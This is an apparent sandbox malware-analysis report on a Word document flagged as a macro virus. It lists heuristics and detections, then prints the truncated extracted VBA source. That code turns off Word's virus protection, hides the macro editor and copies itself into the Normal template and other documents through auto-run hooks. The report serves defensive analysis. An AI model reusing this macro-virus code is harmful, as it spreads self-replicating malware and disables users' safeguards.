MALICIOUS
Risk Score: 240
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The sample is identified as malicious by ClamAV with multiple critical detections. It contains VBA macros, including AutoOpen and Auto_Close, which are commonly used to execute malicious code upon document opening or closing. The script attempts to copy VBA projects ('Rey' and 'Calivent') to the Normal template, suggesting an attempt to establish persistence or spread.
Heuristics (5)
- ClamAV: Doc.Trojan.CyberHack-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.CyberHack-2
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29710 bytes |

SHA-256: a4888c9ae95e9538d6d26d541f12df1fcfb89ec4cd2fa8393cdf3213c81984dc
Detection: ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Rey"
'Att. Calivent as_99@latinmail.com (rey)
'If You Want to Learn, Contact Me
'I exchange information, and I collect viruses of every brand
Public cal1
Public cal2
Public cal3
Sub AutoOpen()
If Day(Now) = Minute(Now) Then Call Adornos
Call Principal
End Sub
Sub FileOpen()
Call Principal
Dialogs(wdDialogFileOpen).Show
Call Ocultar
Call Copiar1
Call Gravhack
Call Unimoq
End Sub
Sub Ocultar()
Moqu = Application.DisplayAlerts
Application.DisplayAlerts = wdAlertsNone
Call Moquegua
WordBasic.DisableAutoMacros 0
CommandBars("Visual Basic").Visible = False
CommandBars("Visual Basic").Enabled = False
CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
CommandBars("Visual Basic").Protection = msoBarNoCustomize
FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
On Error GoTo 0
End Sub
Sub Unimoq()
Application.DisplayAlerts = Moqu
End Sub
Sub Copiar1()
On Error GoTo Jiu2
cal1 = 0
cal3 = False
Set Ad = ActiveDocument
Set NT = NormalTemplate
If cal3 = False Then
On Error GoTo Jit2
Application.OrganizerCopy Source:=NT.FullName, Destination:=Ad.FullName, Name:="Rey", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=NT.FullName, Destination:=Ad.FullName, Name:="Calivent", Object:=wdOrganizerObjectProjectItems
cal1 = 1
Jit2:
End If
Jiu2:
End Sub
Sub Copiar2()
Call Moquegua
On Error GoTo Jiu1
cal2 = False
Set Ad = ActiveDocument
Set NT = NormalTemplate
On Error GoTo Jit1a
For i = 1 To NT.VBProject.VBComponents.Count
NMacr = NT.VBProject.VBComponents(i).Name
Next i
Jit1a:
If cal2 = False Then
On Error GoTo Jit1
Application.OrganizerCopy Source:=Ad.FullName, Destination:=NT.FullName, Name:="Rey", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=Ad.FullName, Destination:=NT.FullName, Name:="Calivent", Object:=wdOrganizerObjectProjectItems
Templates(NT.FullName).Save
Jit1:
End If
Jiu1:
End Sub
Sub Principal()
Call Ocultar
Call Copiar2
Call Unimoq
End Sub
Sub Moquegua()
With Options
.VirusProtection = False
.SaveNormalPrompt = False
End With
End Sub
Sub Gravhack()
On Error GoTo Jit4
Set Ad = ActiveDocument
If cal1 = 1 Then
Ad.SaveAs FileName:=Ad.Name, FileFormat:=wdFormatDocument
End If
Jit4:
End Sub
Sub AutoClose()
Call Ocultar
Call Copiar2
Call Copiar1
Call Unimoq
ActiveDocument.SaveAs
Call Principal
End Sub
Sub FileClose()
Call Ocultar
Call Copiar2
Call Copiar1
Call Unimoq
ActiveDocument.SaveAs
Call Principal
Call Sys
End Sub
Sub FileSaveAs()
Call Ocultar
Call Copiar2
Call Copiar1
Call Unimoq
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub HelpAbout()
On Error GoTo Jiu3
Calivent.Show
Jiu3:
Call Principal
Call Gusto
End Sub
Sub HerramMacro()
On Error GoTo Jiu3
Calivent.Show
Application.OnTime Now + TimeValue("00:30:02"), "adornos"
Jiu3:
Call Principal
End Sub
Sub FileExit()
Call Ocultar
Call Copiar2
Call Copiar1
On Error GoTo Jiu4
If WeekDay(Date) = 5 Then Calivent.Show
Jiu4:
Call Unimoq
WordBasic.FileExit
End Sub
Sub ToolsCustomize()
On Error Resume Next
Call Principal
End Sub
Sub ToolsCustomizeKeyboard()
On Error Resume Next
Call Principal
End Sub
Sub ToolsOptions()
Dialogs(wdDialogToolsOptions).Show
Call Principal
End Sub
Sub FileNew()
Call Principal
Dialogs(wdDialogFileNew).Show
End Sub
Sub FileTemplates()
On Error Resume Next
Call Principal
End Sub
Sub ViewVBCode()
Calivent.Sh
... (truncated)